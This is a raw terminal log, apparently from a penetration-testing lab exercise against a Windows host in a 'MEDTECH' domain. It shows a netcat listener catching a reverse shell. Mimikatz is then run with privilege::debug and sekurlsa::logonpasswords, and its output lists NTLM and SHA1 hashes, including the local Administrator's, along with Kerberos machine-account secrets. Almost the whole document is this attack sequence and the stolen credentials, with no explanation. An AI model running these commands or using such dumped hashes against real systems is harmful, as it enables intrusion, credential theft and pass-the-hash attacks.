C:\Users\tempadmin\Desktop>nc.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.246.121] from (UNKNOWN) [192.168.246.121] 63850
Microsoft Windows [Version 10.0.20348.169]
(c) Microsoft Corporation. All rights reserved.

C:\users\Administrator\Desktop>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 3AC4-A29C

 Directory of C:\users\Administrator\Desktop

06/18/2023  02:11 PM    <DIR>          .
09/29/2022  01:50 AM    <DIR>          ..
06/18/2023  02:07 PM         1,355,264 mimikatz.exe
06/18/2023  02:11 PM            59,392 nc.exe
06/18/2023  08:30 AM                34 proof.txt
               3 File(s)      1,414,690 bytes
               2 Dir(s)  19,923,275,776 bytes free

C:\users\Administrator\Desktop>mimikatz.exe
mimikatz.exe

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz # privilege::debug
Privilege '20' OK

mimikatz # sekurlsa::logonpasswords

Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : PROD01$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 5/17/2023 7:25:58 PM
SID               : S-1-5-20
        msv :
         [00000003] Primary
         * Username : PROD01$
         * Domain   : MEDTECH
         * NTLM     : 82a0a20f7c4cb753f5fde9cfc760a2e8
         * SHA1     : b44dd1ce70a26adbf1640dd8c88fd7838f59ef9c
        tspkg :
        wdigest :
         * Username : PROD01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : prod01$
         * Domain   : MEDTECH.COM
         * Password : b3 97 4c 3a b7 f7 98 95 ac 32 b7 8d c2 27 d3 7b 74 9d bb b2 8b 29 e4 3a e8 67 f6 ba 13 5a 6e 96 e9 eb 61 f2 b6 3f 22 13 58 db b0 db 49 98 55 49 45 2b 56 7f 41 3b 99 e0 ae 1b c8 0d 07 b8 68 e0 59 f1 c7 73 a8 b8 9f c9 eb ce aa 59 24 20 98 e4 b1 fa b2 35 bc 66 18 aa a9 e6 25 ba 68 44 b8 cc 22 ca f5 5a 1c fd 9f 0b 84 94 9d fd c7 1f 0d 4f 69 a7 42 c2 d3 1e 1a 51 bb f5 16 b2 f7 6f 67 c9 6b 7b c5 a9 ba c4 5e 2f 7d 4c 4d 56 eb 3a db 45 6b 09 56 be 95 5a d1 e4 d2 02 27 45 93 66 3a 7c f6 cf 7d 08 c7 ca 72 4b c4 49 86 b3 c9 a5 29 36 13 83 df 3a 45 46 7d 4c b5 63 ad fe fd 12 72 e2 b0 b5 6e 60 00 30 55 b0 48 fa a2 97 35 64 69 4b 35 94 0f 66 c1 ff 1d 08 db ff c7 e7 87 f1 25 7e 4f 83 d8 cb 6c 82 10 96 a9 a3 e1 f6 60 72 d2 f8
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 38284 (00000000:0000958c)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 5/17/2023 7:25:57 PM
SID               :
        msv :
         [00000003] Primary
         * Username : PROD01$
         * Domain   : MEDTECH
         * NTLM     : 82a0a20f7c4cb753f5fde9cfc760a2e8
         * SHA1     : b44dd1ce70a26adbf1640dd8c88fd7838f59ef9c
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 478034 (00000000:00074b52)
Session           : Batch from 0
User Name         : Administrator
Domain            : PROD01
Logon Server      : PROD01
Logon Time        : 5/17/2023 7:28:27 PM
SID               : S-1-5-21-1884493056-1896133804-658793092-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : PROD01
         * NTLM     : aa53d35834f2cf125422f48091de5a42
         * SHA1     : 776fd79d2e958bd271536fa0d1a1041a56137a50
        tspkg :
        wdigest :
         * Username : Administrator
         * Domain   : PROD01
         * Password : (null)
        kerberos :
         * Username : Administrator
         * Domain   : PROD01
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 5/17/2023 7:25:59 PM
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 69604 (00000000:00010fe4)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/17/2023 7:25:58 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : PROD01$
         * Domain   : MEDTECH
         * NTLM     : 594582ca30133239d0e73b6160d391c6
         * SHA1     : 52108e0fe24dc7dca5368279482239f2127adb24
        tspkg :
        wdigest :
         * Username : PROD01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : PROD01$
         * Domain   : medtech.com
         * Password : 09 88 11 3a 12 1f 07 6f b5 cc 15 c2 87 67 f3 97 51 a5 df 71 be 7a 6d 50 12 ac fa f2 69 f3 51 65 05 e5 fb 47 d8 ae 25 6b b5 f9 4a 09 31 17 cf 77 62 e5 5c 6e 91 79 3d f1 2d bc ed 41 6e 55 a0 24 b5 63 82 c9 3a 68 42 e8 4a e6 29 80 49 e1 c6 68 97 82 0e 54 ec ee 07 47 dd 52 bd 5d 9e 3b d2 fe 15 e4 ff f1 02 c5 90 05 54 2b 67 33 f4 06 41 02 3a c6 52 4b 7b 56 e8 13 90 47 d4 84 8b 5c 77 1c 91 25 fb 80 21 0f 7f 7e 03 ad d0 8d 8a 29 b4 67 82 d1 5e 59 10 ed b5 68 76 d1 bc 3b f9 a2 a3 69 31 1b d7 d6 98 1f 40 17 cf 51 cd c3 59 40 b8 fb 60 ee 16 6d 23 89 d1 6a 26 9f cd 8e b5 39 4a 25 0a 5c 38 55 04 e4 70 94 3a 84 6c 80 e5 95 64 fa 65 a2 20 e5 01 a2 3f e0 08 46 9d fd fa fc 00 99 27 c1 db c7 3c a9 07 d2 e0 fa 2d 65 c8 cb 59 7b
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 69586 (00000000:00010fd2)
Session           : Interactive from 1
User Name         : DWM-1
Domain            : Window Manager
Logon Server      : (null)
Logon Time        : 5/17/2023 7:25:58 PM
SID               : S-1-5-90-0-1
        msv :
         [00000003] Primary
         * Username : PROD01$
         * Domain   : MEDTECH
         * NTLM     : 82a0a20f7c4cb753f5fde9cfc760a2e8
         * SHA1     : b44dd1ce70a26adbf1640dd8c88fd7838f59ef9c
        tspkg :
        wdigest :
         * Username : PROD01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : PROD01$
         * Domain   : medtech.com
         * Password : b3 97 4c 3a b7 f7 98 95 ac 32 b7 8d c2 27 d3 7b 74 9d bb b2 8b 29 e4 3a e8 67 f6 ba 13 5a 6e 96 e9 eb 61 f2 b6 3f 22 13 58 db b0 db 49 98 55 49 45 2b 56 7f 41 3b 99 e0 ae 1b c8 0d 07 b8 68 e0 59 f1 c7 73 a8 b8 9f c9 eb ce aa 59 24 20 98 e4 b1 fa b2 35 bc 66 18 aa a9 e6 25 ba 68 44 b8 cc 22 ca f5 5a 1c fd 9f 0b 84 94 9d fd c7 1f 0d 4f 69 a7 42 c2 d3 1e 1a 51 bb f5 16 b2 f7 6f 67 c9 6b 7b c5 a9 ba c4 5e 2f 7d 4c 4d 56 eb 3a db 45 6b 09 56 be 95 5a d1 e4 d2 02 27 45 93 66 3a 7c f6 cf 7d 08 c7 ca 72 4b c4 49 86 b3 c9 a5 29 36 13 83 df 3a 45 46 7d 4c b5 63 ad fe fd 12 72 e2 b0 b5 6e 60 00 30 55 b0 48 fa a2 97 35 64 69 4b 35 94 0f 66 c1 ff 1d 08 db ff c7 e7 87 f1 25 7e 4f 83 d8 cb 6c 82 10 96 a9 a3 e1 f6 60 72 d2 f8
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 39510 (00000000:00009a56)
Session           : Interactive from 0
User Name         : UMFD-0
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/17/2023 7:25:57 PM
SID               : S-1-5-96-0-0
        msv :
         [00000003] Primary
         * Username : PROD01$
         * Domain   : MEDTECH
         * NTLM     : 82a0a20f7c4cb753f5fde9cfc760a2e8
         * SHA1     : b44dd1ce70a26adbf1640dd8c88fd7838f59ef9c
        tspkg :
        wdigest :
         * Username : PROD01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : PROD01$
         * Domain   : medtech.com
         * Password : b3 97 4c 3a b7 f7 98 95 ac 32 b7 8d c2 27 d3 7b 74 9d bb b2 8b 29 e4 3a e8 67 f6 ba 13 5a 6e 96 e9 eb 61 f2 b6 3f 22 13 58 db b0 db 49 98 55 49 45 2b 56 7f 41 3b 99 e0 ae 1b c8 0d 07 b8 68 e0 59 f1 c7 73 a8 b8 9f c9 eb ce aa 59 24 20 98 e4 b1 fa b2 35 bc 66 18 aa a9 e6 25 ba 68 44 b8 cc 22 ca f5 5a 1c fd 9f 0b 84 94 9d fd c7 1f 0d 4f 69 a7 42 c2 d3 1e 1a 51 bb f5 16 b2 f7 6f 67 c9 6b 7b c5 a9 ba c4 5e 2f 7d 4c 4d 56 eb 3a db 45 6b 09 56 be 95 5a d1 e4 d2 02 27 45 93 66 3a 7c f6 cf 7d 08 c7 ca 72 4b c4 49 86 b3 c9 a5 29 36 13 83 df 3a 45 46 7d 4c b5 63 ad fe fd 12 72 e2 b0 b5 6e 60 00 30 55 b0 48 fa a2 97 35 64 69 4b 35 94 0f 66 c1 ff 1d 08 db ff c7 e7 87 f1 25 7e 4f 83 d8 cb 6c 82 10 96 a9 a3 e1 f6 60 72 d2 f8
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 39488 (00000000:00009a40)
Session           : Interactive from 1
User Name         : UMFD-1
Domain            : Font Driver Host
Logon Server      : (null)
Logon Time        : 5/17/2023 7:25:57 PM
SID               : S-1-5-96-0-1
        msv :
         [00000003] Primary
         * Username : PROD01$
         * Domain   : MEDTECH
         * NTLM     : 82a0a20f7c4cb753f5fde9cfc760a2e8
         * SHA1     : b44dd1ce70a26adbf1640dd8c88fd7838f59ef9c
        tspkg :
        wdigest :
         * Username : PROD01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : PROD01$
         * Domain   : medtech.com
         * Password : b3 97 4c 3a b7 f7 98 95 ac 32 b7 8d c2 27 d3 7b 74 9d bb b2 8b 29 e4 3a e8 67 f6 ba 13 5a 6e 96 e9 eb 61 f2 b6 3f 22 13 58 db b0 db 49 98 55 49 45 2b 56 7f 41 3b 99 e0 ae 1b c8 0d 07 b8 68 e0 59 f1 c7 73 a8 b8 9f c9 eb ce aa 59 24 20 98 e4 b1 fa b2 35 bc 66 18 aa a9 e6 25 ba 68 44 b8 cc 22 ca f5 5a 1c fd 9f 0b 84 94 9d fd c7 1f 0d 4f 69 a7 42 c2 d3 1e 1a 51 bb f5 16 b2 f7 6f 67 c9 6b 7b c5 a9 ba c4 5e 2f 7d 4c 4d 56 eb 3a db 45 6b 09 56 be 95 5a d1 e4 d2 02 27 45 93 66 3a 7c f6 cf 7d 08 c7 ca 72 4b c4 49 86 b3 c9 a5 29 36 13 83 df 3a 45 46 7d 4c b5 63 ad fe fd 12 72 e2 b0 b5 6e 60 00 30 55 b0 48 fa a2 97 35 64 69 4b 35 94 0f 66 c1 ff 1d 08 db ff c7 e7 87 f1 25 7e 4f 83 d8 cb 6c 82 10 96 a9 a3 e1 f6 60 72 d2 f8
        ssp :
        credman :
        cloudap :

Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : PROD01$
Domain            : MEDTECH
Logon Server      : (null)
Logon Time        : 5/17/2023 7:25:57 PM
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : PROD01$
         * Domain   : MEDTECH
         * Password : (null)
        kerberos :
         * Username : prod01$
         * Domain   : MEDTECH.COM
         * Password : b3 97 4c 3a b7 f7 98 95 ac 32 b7 8d c2 27 d3 7b 74 9d bb b2 8b 29 e4 3a e8 67 f6 ba 13 5a 6e 96 e9 eb 61 f2 b6 3f 22 13 58 db b0 db 49 98 55 49 45 2b 56 7f 41 3b 99 e0 ae 1b c8 0d 07 b8 68 e0 59 f1 c7 73 a8 b8 9f c9 eb ce aa 59 24 20 98 e4 b1 fa b2 35 bc 66 18 aa a9 e6 25 ba 68 44 b8 cc 22 ca f5 5a 1c fd 9f 0b 84 94 9d fd c7 1f 0d 4f 69 a7 42 c2 d3 1e 1a 51 bb f5 16 b2 f7 6f 67 c9 6b 7b c5 a9 ba c4 5e 2f 7d 4c 4d 56 eb 3a db 45 6b 09 56 be 95 5a d1 e4 d2 02 27 45 93 66 3a 7c f6 cf 7d 08 c7 ca 72 4b c4 49 86 b3 c9 a5 29 36 13 83 df 3a 45 46 7d 4c b5 63 ad fe fd 12 72 e2 b0 b5 6e 60 00 30 55 b0 48 fa a2 97 35 64 69 4b 35 94 0f 66 c1 ff 1d 08 db ff c7 e7 87 f1 25 7e 4f 83 d8 cb 6c 82 10 96 a9 a3 e1 f6 60 72 d2 f8
        ssp :
        credman :
        cloudap :
